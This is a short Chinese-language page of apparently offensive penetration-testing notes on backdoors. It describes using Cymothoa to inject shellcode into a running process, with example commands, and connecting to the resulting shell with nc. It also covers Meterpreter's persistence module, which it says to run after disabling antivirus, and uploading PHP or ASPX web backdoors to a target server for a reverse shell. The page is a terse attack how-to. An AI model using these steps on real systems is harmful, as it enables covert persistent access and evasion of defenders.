search

backdoor

hashtag
操作系统后门

hashtag
Cymothoa后门

https://github.com/jorik041/cymothoaarrow-up-right

这是一款可以将ShellCode注入到现有进程,返回注入进程权限shell的后门工具。

与被注入进程共存,只要系统防护人员不检测内存就发现不了。

1)查看程序PID

Linux: ps -aux

cymothoa -p 882 -s 1 4444 # -p指定被注入进程PID,-s 指定ShellCode编号

nc -nvv 192.168.1.101 4444 #连接目标主机后门

hashtag
Persistence后门

这是一种安装自启动方式的后门

Meterpreter > run persistence -h #查看所有命令选项

1545657629964

生成新的meterpreter session

会触发杀软,使用前先关闭杀软

hashtag
Web后门

hashtag
PHP后门

上传到目标服务器

攻击者启动handler监听,打开http://IP/main.phparrow-up-right 反弹shell

hashtag
Aspx后门

上传,然后和PHP版本的操作一样。

PreviousmsfNextreadme

Last updated

Was this helpful?